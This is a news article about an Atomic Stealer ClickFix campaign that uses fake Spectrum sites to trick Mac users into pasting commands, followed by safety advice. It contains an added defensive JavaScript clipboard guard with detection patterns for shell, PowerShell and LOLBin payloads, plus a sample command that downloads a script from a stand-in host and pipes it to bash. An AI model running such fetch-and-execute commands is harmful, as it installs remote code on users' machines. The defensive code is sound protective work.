Even though people often think Macs are safe from malware, that definitely isn’t true. Case in point, a new Atomic Stealer campaign which is being used to infect the best MacBooks and other Apple computers with info-stealing malware has been spotted online.
As reported by The Hacker News, the campaign was discovered by the cybersecurity firm CloudSEK and is believed to be the work of Russian hackers, based on comments in the malware’s source code.
What makes this campaign particularly interesting is that, in addition to typosquatting, it also uses social engineering to trick unsuspecting Mac users into falling for it. For those unfamiliar, typosquatting is a type of attack where cybercriminals register lookalike domains in order to lay traps for potential victims who mistype a popular site’s URL into their browser’s address bar. While they might think they’re on a popular company’s website, they’re actually on a fake site designed to mimic the real one, which is then used to spread dangerous malware.
Once infected with Atomic Stealer, the malware can steal personal and sensitive data from your Mac like passwords stored in your Apple Keychain, browser cookies, login credentials, credit card details and more.
Here’s everything you need to know about this new malware campaign along with some tips and tricks to prevent you from falling victim to it and other cyberattacks.
Not the Spectrum you were looking for
According to CloudSEK, the hackers behind this new campaign are impersonating the U.S. internet and cable provider Spectrum using a number of different fake sites. While Spectrum’s official website can be found at spectrum[.]com, in its blog post the firm highlights one of these fake sites, which uses the URL panel-spectrum[.]net.
Once on this fake site, potential victims are asked to complete a reCAPTCHA to verify that they aren’t bots. Since many sites use this or similar forms of verification, many people might not even think twice when asked to check a box to prove they’re human. However, on the fake site shared by CloudSEK, once verification fails, potential victims are then asked to complete an alternative verification instead.
When someone clicks the button that reads “Alternative Verification”, a command is copied to their clipboard without their knowledge. On Windows, a set of instructions then appears asking them to open a command prompt, paste what was copied to their clipboard and hit “Enter” to run it. If someone is using a Mac, slightly different instructions are shown that lead to the same outcome: their computer being infected with info-stealing malware.
On Macs, a malicious shell script is used to steal system passwords and download a variant of the Atomic Stealer malware. As CloudSEK security researcher Koushik Pal points out in the company’s report, the script “uses native macOS commands to harvest credentials, bypass security mechanisms, and execute malicious binaries.”
How to stay safe from Mac malware
Given that hackers use all kinds of different tricks to lead potential victims to fake sites spreading malware, it’s always best to type a company’s website into your browser’s address bar manually. However, you should also double-check that you spelled it correctly.
If you don’t know a company’s official site, you can use a search engine to find it. One thing you want to be careful about, though, is not clicking the first link you see. On Google and other search engines, the links at the top are often ads, while finding a company’s actual website often requires scrolling a bit further down the page. The problem with clicking on an ad or a sponsored search result is that cybercriminals often use malicious ads to take users to fake sites instead of a company’s actual site, since anyone (even hackers) can buy ad space online.
From here, it’s a matter of knowing how to identify a ClickFix attack. Many sites ask that you complete a reCAPTCHA or other form of verification before entering. However, if a site asks you to open a command window and paste something from your clipboard there before hitting “Enter”, this is a major red flag. A legitimate company might ask you to select all of the images that contain cars, but it would never copy code to your clipboard without your knowledge and then ask you to paste and run it somewhere else.
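The red flag described above, and the “Alternative Verification” button mechanism from the campaign write-up, both come down to a web page writing a runnable command to the clipboard without the visitor having selected anything. The following is an added defensive example, not code from the article or from CloudSEK’s report: a small clipboard guard that wraps the browser’s clipboard-write APIs, classifies whatever a page tries to put on the clipboard, and reports writes that look like a pasteable shell or PowerShell command. The indicator patterns, the `example.invalid` sample commands and the stand-in `navigator.clipboard` object used to run it under Node are all constructed for illustration.

```javascript
// Added example (not from the article or CloudSEK): report page-initiated clipboard
// writes that look like a ClickFix payload. Runs under Node with fake clipboard/doc
// objects; in a browser you would pass navigator.clipboard and document instead.

// Indicator patterns are assumptions for illustration, not taken from the report.
const PAYLOAD_INDICATORS = [
  { label: 'download piped to shell', re: /\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(sh|bash|zsh)\b/i },
  { label: 'base64 decode', re: /\bbase64\b[^\n]*\s(?:-d|-D|--decode)\b/ },
  { label: 'osascript', re: /\bosascript\b/i },
  { label: 'encoded or hidden PowerShell',
    re: /\bpowershell(?:\.exe)?\b[^\n]*(?:-enc(?:odedcommand)?\b|-e\s|-w(?:indowstyle)?\s+hidden|\biex\b|invoke-expression)/i },
  { label: 'LOLBin launcher', re: /\b(mshta|certutil|rundll32|regsvr32)\b/i },
  { label: 'command substitution', re: /\$\([^)]*\)|`[^`]+`/ },
];

// Classify text a page is about to place on the clipboard.
function classifyClipboardText(text) {
  if (typeof text !== 'string') return { suspicious: false, indicators: [] };
  const indicators = PAYLOAD_INDICATORS
    .filter(({ re }) => re.test(text))
    .map(({ label }) => label);
  return { suspicious: indicators.length > 0, indicators };
}

// Wrap clipboard.writeText (the modern async Clipboard API). onWrite receives every
// write with its verdict; the write itself still goes through so the page keeps working.
function installClipboardGuard(clipboard, onWrite) {
  const originalWriteText = clipboard.writeText.bind(clipboard);
  clipboard.writeText = function guardedWriteText(text) {
    onWrite({ text, ...classifyClipboardText(text) });
    return originalWriteText(text);
  };
  return function uninstall() { clipboard.writeText = originalWriteText; };
}

// Wrap document.execCommand('copy'), the older hidden-textarea copy technique, which
// copies the current selection rather than an explicit string.
function installExecCommandGuard(doc, onWrite) {
  const originalExec = doc.execCommand.bind(doc);
  doc.execCommand = function guardedExecCommand(command, ...rest) {
    if (String(command).toLowerCase() === 'copy') {
      const text = doc.getSelection ? String(doc.getSelection()) : '';
      onWrite({ text, ...classifyClipboardText(text) });
    }
    return originalExec(command, ...rest);
  };
  return function uninstall() { doc.execCommand = originalExec; };
}

// Constructed demonstration: a stand-in for navigator.clipboard so this runs under Node.
const fakeClipboard = { writeText: async () => undefined };
const events = [];
installClipboardGuard(fakeClipboard, (e) => events.push(e));
fakeClipboard.writeText('curl -fsSL https://verify.example.invalid/run.sh | bash'); // constructed sample
fakeClipboard.writeText('Order confirmation #48213');                                // benign sample
for (const e of events) {
  console.log(e.suspicious
    ? `SUSPICIOUS clipboard write (${e.indicators.join(', ')}): ${e.text}`
    : `clipboard write looks benign: ${e.text}`);
}
```

Two caveats for anyone adapting this into a browser extension or user script: legitimate developer documentation also copies `curl ... | sh` install lines, so the guard reports rather than blocks and is best paired with the question the article raises, namely whether the text was visible and deliberately selected before it landed on the clipboard; and a page can always render instructions as plain text for the visitor to type by hand, so the guard catches the silent-copy trick specifically, not every variant of the social engineering.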
Although your Mac does come with built-in security software in the form of Apple’s own XProtect, it’s still a good idea to consider investing in one of the best Mac antivirus software solutions. Unlike free antivirus software, these paid options are updated more frequently and are more likely to spot and help you avoid newer malware strains like Atomic Stealer.
Given that attacks using this ClickFix technique have proven both successful and profitable for hackers and other cybercriminals, they’re not going anywhere anytime soon. This is why it makes sense to educate yourself and your family members about these sorts of threats so that you can spot any red flags before your Mac or PC becomes infected with malware.